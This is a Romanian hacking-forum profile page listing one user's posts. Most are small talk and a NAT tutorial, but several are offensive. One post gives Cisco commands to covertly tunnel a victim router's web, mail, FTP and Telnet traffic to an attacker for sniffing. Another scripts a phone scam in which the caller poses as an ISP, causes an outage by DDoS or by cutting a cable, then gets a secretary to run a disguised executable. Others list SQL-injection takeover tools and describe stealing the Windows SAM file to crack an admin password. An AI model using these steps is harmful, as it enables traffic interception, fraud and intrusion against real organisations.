Jump to content

NullCode

Active Members
  • Posts

    179
  • Joined

  • Last visited

Everything posted by NullCode

  1. glumesti nu ?
  2. Sa spune ca avem o retea mare de calculatoare si am vrea sa configuram reteau a.i. toate PC-urile sa iasa cu un sigur IP pe internet. Vom avea nevoie sa configuram PAT/NAT pe router. Network address translation - Wikipedia, the free encyclopedia Tot ce trebuie sa facem este : configure terminal ip nat pool RST 170.168.2.1 170.168.2.1 netmask 255.255.255. //facem o lista de adrese alcatuita dintr-un singur IP, acesta fiind IP-ul vizibil pe internet. interface Ethernet0/0 //intram in interfata(sau portul) cu "fatza" la LAN ip address 10.1.1.10 255.255.255.0 //ii asignam o adresa IP si o masca ip nat inside //ii spunem routerului ca acesta este Interiorul retelei interface Serial0/0//intram in interfata(sau portul) cu "fatza" la internet ip address 170.168.2.1 255.255.255.0//ii asignam o adresa IP si o masca ip nat outside //ii spunem routerului ca acesta este exteriorul retelei(internetul) access-list 1 permit 10.1.1.0 0.0.0.255 //construim o regula pentru a spune ce hosturi pot folosi IP-ul de internet ip nat inside source list 1 pool RST overload //spunem sa faca overload pe lista de IP-uri precizata mai dvrm
  3. O sa urmeze o serie de Tutoriale Cisco. Le voi posta in acest thread. Sa luam un caz concret. La ce va ajuta daca aveti acces la un Router Cisco?! In primul rand, tot traficul va trece prin acel Router, dar cum ati putea intercepta tot acest trafic, avand in vedere ca nu este langa dvs(altfel am folosi direct un wireshark si am rezolva problema)?! Pentru asta exista Gre Tunnel. Ce este acest Gre tunnel? Pai un tunnel Virtual intre 2 routere. Generic Routing Encapsulation - Wikipedia, the free encyclopedia Luam imaginea urmatoare: http://img18.imageshack.us/img18/2343/ciscofun1.jpg Vrem sa trimitem tot traficul victimei catre routerul nostru, astfel incat noi sa putem intercepta tot traficul. Avand acces la routerul victimei configuram astfel routerul: Construim tunnelul Gre pe Routerul Victimei: conf t //intram in interfata de configurare interface tunnel0 //facem interfata virtual de tunnel ip address 192.168.10.1 255.255.255.0 //punem un ip interfetei virtuale tunnel source e0/0 //spunem de unde pleaca traficul tunnel destination 80.179.20.55 //si unde se duce Apoi trebuie sa ii spunem routerului ce informatii sa filtreze: access-list 101 permit tcp any any eq 443 // facem o regula de acces ce trebuie sa filtreze access-list 101 permit tcp any any eq 80 // routereul, am hotarat sa primim informatii doar access-list 101 permit tcp any any eq 21 //daca se primesc pachete pe porturile 80,21,.. access-list 101 permit tcp any any eq 20 access-list 101 permit tcp any any eq 23 access-list 101 permit tcp any any eq 25 access-list 101 permit tcp any any eq 110 Sa va explic a 2a comanda: access-list 101 permit tcp any any eq 80 Prin aceasta ii spunem sa filtreze doar pachetele TCP ce au orice sursa si se duc catre orice destinatie, iar portul destinatie este 80. Aplicam aceasta regula(access-list) pe interfata: router-map divert-traffic // Cream o regula(o regula pentru a fowarda traficul match ip address 101 //Spunem sa filtreze dupa acces-list 101 interface Ethernet0/0 //intram in interfata e0/0 ip policy route-map divert-traffic //aplicam regula pe interfata de iesire catre internet Apoi configuram pe routerul nostrul doar Gre tunnel: Attacker(config)# interface tunnel0 Attacker(config-if)# ip address 192.168.10.2 255.255.255.0 Attacker(config-if)# tunnel source Ethernet0/0 Attacker(config-if)# tunnel destination 21.199.146.242 Tot ce mai trebuie sa facem este sa ascultam traficul cu un wireshark conectat la router.
  4. Multumesc pentru link, de mult cautam o carte ce trateaza SQLi.
  5. O sa ma uit peste carte, si iti spun si parerea mea despre ea. Thx
  6. w3af – Web Application Attack and Audit Framework Link: Browse w3af Files on SourceForge.net sqlmap 0.7 Released – Automatic SQL Injection Tool Download sqlmap from SourceForge.net MySqloit – SQL Injection Takeover Tool For LAMP http://mysqloit.googlecode.com/files/MySqloitv0.1.tar bsqlbf v2.3 Released – Blind SQL Injection Brute Forcing Tool http://bsqlbf-v2.googlecode.com/files/bsqlbf-v2-3.pl sqlsus 0.2 Released – MySQL Injection & Takeover Tool Download sqlsus from SourceForge.net WITOOL v0.1 – GUI Based SQL Injection Tool in .NET http://witool.sourceforge.net/down/WITOOL_V0.1_081231.zip MultiInjector v0.3 Released – Automatic SQL Injection and Defacement Tool http://www.sn3akers.com/downloads/MultiInjectorV0.3.tar.gz sqlninja 0.2.3 released – Advanced Automated SQL Injection Tool for MS-SQL Download sqlninja from SourceForge.net Mai multe detalii despre ele, google it.
  7. Mrs ptr feedback si promit ca o sa citesc cartea recomandata de tine.("Psihologia multimilor de Gustave le Bon"). Interesant experiment ai facut. Ceea ce ai facut tu se poate aplica la orice nivel, la facultate, la munca etc. Mai ai cumva altele? Eu am venit cu urmatoarea "poveste": Sa zicem ca vrei sa furi o baza de date de la o firma, si nu stii cum sa faci. 1.Pai in primul rand trebuie sa aflii de la ce ISP au internet(destul de usor zic eu). 2.Incerci "Reverse Social Engineering"(prin care pui tinta sa aiba nevoie de tine) Ex: Suni si zici: Buna ziua, suntem de la RDS/UPC/etc.. si am vrea sa va intrebam daca aveti cumva probleme cu internetul, ca se lucreaza la infrastructura in zona dvs. Tinta: Nu, totul merge ok. Atacatorul : Ok, daca aveti probleme sunati la nr-ul 073xxxxxxx. T: Ok. Dupa ce se incheie convorbirea, atacatorul la incerca sa intrerupa conexiunea lor la internet.Taie/scoate cablul principal din router(daca are acces) sau face un DOS/DDOS. Asteapta cateva minute si sigur firma il va suna. Tinta: Buna ziua, avem probleme, nu ne merge internetul etc.. A: Da stim se lucreaza, internetul va reveni in 3 zile. T: CUM!??!! CUM ASA MULT?!!!*se plange etc* A: O sa vad ce pot sa fac. O sa revin cu un telefon, sa vad daca va putem da drumul mai repede la internet. *aici e aplicat reverse social engineering, TINTA are nevoie de atacator* Atacatorul opreste DDOS-ul/baga firul inapoi si suna la TINTA. A: Va merge internetul? T: Da, doar ce si-a revenit! Multumesc mult A: Se lucreaza pe infrastructura, dar v-am pus pe o cale 'speciala'. Veti avea nevoie de un program, va rog intrati pe http://<ip>/rds.exe si dati dublu click si instalati-l si nu veti mai avea probleme. Ati intrat? T: Da acum intru, trb sa fac asta la toate calc?! A: Nu, doar la dvs. T: Va multumesc mult! A: Pentru nimic, O zi buna! T: O zi buna! ------------ Tin sa precizez ca tinta am presupus ca este vreo secretara, si firma este una mica. Vei avea nevoie de sunete de fundal, sa para ca suni de la RDS/UPC.. Exista o regula: NU INCEARCA NICIODATA SA FACI SOCIAL ENGINEERING UNUI OM MAI DESTEPT CA TINE!(gen nu iti va reusi niciodata, cu un sysadmin) P.S:Asta a fost doar o 'poveste' testata de mine
  8. - Part III - Deoarce ingineria sociala exploateza factorul uman, ca veriga cea mai slaba dintr-o organizatie,cea mai eficienta metoda de aparare este educarea oamenilor. Totusi nu trebuie uitat si partea tehnologica(pshingul poate fi evitat, daca ar exista un browser care le-ar detecta). Apararea pe mai multe niveluri Multi-level Defense against Social Engineering: 1.Foundation Level: Politici de securitate impotriva igineriei sociale 2.Parameter Level: Security-awarness pentru useri 3.Fortress Level: Training de calitate pentru personalul cheie 4.Persisence Level: Remindere la intervale mici in legatura cu Ingineria Sociala 5.Gotcha Level: “Social engineering land mines”(SELM). 6.Offensive Level: Atacul impotriva 'hackerului' Concluzie: Ingineria sociala este o adevarata amenintare. Deocamdata firmele nu se protejeaza de asa ceva, dar cu cat acestea vor deveni mai constiente de pericole, va fi aproape imposibil de a exploata aceasta ramura. Sper ca va placut, si astept feedback
  9. - Part I – Securitatea ar trebui sa fie de o mare importanta in fiecare business, din moment ce o bresa in securitate ar afecta atat valoare companiei cat si imaginea acesteia. Acestea fiind spuse, companiile se bazeaza orbeste pe tehnologii ce le-ar putea oferi acest tip de securitate, ignorand cea mai slaba veriga din sistem ” omul”. In cele ce urmeaza va voi prezenta succint ce inseamna “social engineering” si cum se aplica aceasta. Social engineering = un procedeu prin care un om este pacalit in a livra informatii private/confidentiale despre o firma, sau mai peotic spus ” arta si stiinta de a face oamenii sa se supuna dorintelor tale”(Harl 1997). Atunci cand un atacator nu poate invinge tehnologia, aceasta apeleaza la acest timp de atac, inseland angajatii sa le dea acces. De ce Social Engineering are o rata de succes mare? Acest tip de atac exploateaza vulnerabilitatile umane, ca ignorata sau naivitatea si foloseste concepte ca autoritatea, emotiile puternice, reciprocitatea, suprasolicitarea. Cele mai multe atacuri se pot gasi in “6 weapons of influence” ( reciprocity, commitment and consistency, social proof, linking, authority , scarcity ) – Cialdini 1993. O alta “vulnerabilitate” a oamenilor este aceea ca omul doreste sa ajute, astfel cautand satisfactie in ajutorarea unor persoane “la nevoie”. Va voi prezenta cateva din vulnerabilitatile umane : I.Emotiile puternice: Acestea sunt folosite pentru a aduce “tinta” la o stare emotionala asa mare, incat aceasta sa nu mai dea atentie argumentelor. Ex : 1. Anticiparea (primeste bani sau un premiu, astfel facand omul mai putin suspicios) 2. Stres : angajatii sunt facuti sa creada ca vor fi concediati sau ca vor fi consecinte grave in urma deciziilor luate de acestia. Altele ar mai fi : suprize, frica, suparare, panica, emotionare. II. Supra solicitarea: Un om poate procesa o informatie intr-un anumit timp limitat. Modul de a folosi aceasta vulnerabilitate este felul in care niste informatii corecte pot fi puse alaturi de informatii eronate, iar cele din urma fiind mai greu de observat. Alt mod ar fi abordarea unei probleme din o alta perspectiva, dar “victimei” nu ii este lasata timp sa se gandeasca la aceasta perspectiva astfel lasand victima devenind mult mai maleabila(ar accepta opinini fara sa mai puna intrebari). III. Reciprocitatea: Este descrisa ca un sentiment ce te face sa raspunzi automat la o favoare/cadou ce primesti. Omul este multi mai deschis sa raspunda la o cerere, daca a primit un cadou in prealabil. Tot conceptul se refera la modalitatea de oferta-cerere. Cu cat dai mai mult, cu atat vei primi mai mult in schimb. IV. Relatii: Cu cat o relatie este mai lunga, cu atat vei vedea mai mult incredere intre 2 persoane. O modalitatea de a stabili o relatie este modul prin care 2 oameni pot deveni prieteni avand acelasi inamic. Un exemplu interesant ar fi cel prezentat de Mitnick ” two-year hack” ( Midnick and Simon 2005) V.Autoritatea: Aceasta este una din cele mai folosite modalitati de a sustrage informatii. O persoana va desfasura o actiune cu o probabilitate mai mare, daca o persoana cu autoritate le-o va cere. Ex: Experimentul Milgram. Il puteti gasi -> Milgram_experiment VI.Integritate: Acest idee se refera la inclinatia oamenilor de a rezolva niste task-uri, daca acestea sunt scrise si semnate de catre cineva. Adica vor reactiona la niste task-uri mai repede in scris, decat daca ar fi fost informati prin telefon. Ex: un angajat este plecat in vacanta, iar atacatorul stie asta. El ar putea trimite mail-uri in numele lui, iar acestea sa fie citite si executate de catre alti oameni in subordinea lui, fara prea multe intrebari. Tehnici de social-engineering: 1.Culegerea de informatii de pe Google. 2.Internet 3.Newsgroups 4.Listari telefonice( Pagini aurii/albe) 5.Google Maps 6. Social/Business Networking Sites ( hi5,facebook,linkdb) 7.Blogs 8.IRC/IM( yahoo,msn) 9.Spionaj 10.Telefon 11. Fata-in-fata 12.Dumpster Diving 13.Phishing 14.Reverse Social Engineering 15.Alte metode( nici eu nu le stiu pe toate ) Asta a fost una dintr-o serie de 3 articole despre acest subiect.
  10. As putea ajuta, dar ceva nou si nemaintalnit nu am. Pot oferi hint-uri/tip-uri. E destul ?
  11. Eu folosesc Edimax, si va asigur ca merge cu aircrack(testat de mine). Link-ul pe emag: http://www.emag.ro/adaptoare_ethernet/adaptor-wireless-edimax-ew-7318usg--pEW-7318USG?ref=vp_ap Si pentru a vedea daca e compatibila placa voastra intrati aici: compatible_cards [Aircrack-ng]
  12. Lol ala de insecure.ro nu fura , doar a uitat sa precizeze sursa ( acum vad ca pus-o )
  13. NullCode

    Sugestie

    uite-te un post mai sus am realizat si eu .
  14. NullCode

    Sugestie

    he ai dreptate cu ziua ) deci niciodata nu am vazut postata ora/ziua acolo . Mai ramane doar o sugestie atunci ,sau mutata ziua/ora undeva dreapta sus la fiecare post .
  15. dragoselu merge la inchisoare pentru ca numele lui rimeaza cu "cocoselu "
  16. NullCode

    Sugestie

    Poate ar trebui sa apara timpul cand a fost postat un "post " . Adica cand se da un reply sa apara cand a fost dat reply-ul si un "quick reply " ar fi bine . Oricum forumul este f frumos , succes in continuare
  17. NullCode

    helou der!

    Ce stii/nu stii nu conteaza.. oricum trebuie sa recunosc ca ai fost original cu "Poll-ul " tau . De asta aveam nevoie in romania, de oameni originali ca nu o sa mai facem fata la outsourcing de cand cu India si CHina . P.S.:Welcome .
  18. Nu se poate sa nu existe account de admin pe un windows . Ce poti sa faci este sa bootezi dp un cd bootabil de linux si sa copiezi "Samul " pe un stick/discketa ,sa il iei acasa si sa incerci sa spargi parola de Admin . Alta varianta ar fi sa incerci userul " Administrator " fara parola ( multi uite sa schimbe parola) . Succes
  19. NullCode

    salut

    Specialist it , ce vrea sa insemne asta ? ( nu o lua ca pe o insulta , e doar o intrebare )
  20. Welcome .
  21. Ai talent . Bravo .. chiar sunt frumoase pozele si succes in continuare , prevad un salariu bun ca design artist
  22. Multumesc kw3rln.
  23. SkaDate ai ? Sau la abledating dak ai serial .
  24. Roaga-te sa fi in retea..prin hub ceva sap rinzi asa ceva.. poti afla si parola de yahoo cu ceva mac spoofing . ( asta dak esti in hub..sau server )
  25. ee ce sa faci cu un DOS cam nik ..doar dak te plik ..dar gj
×
×
  • Create New...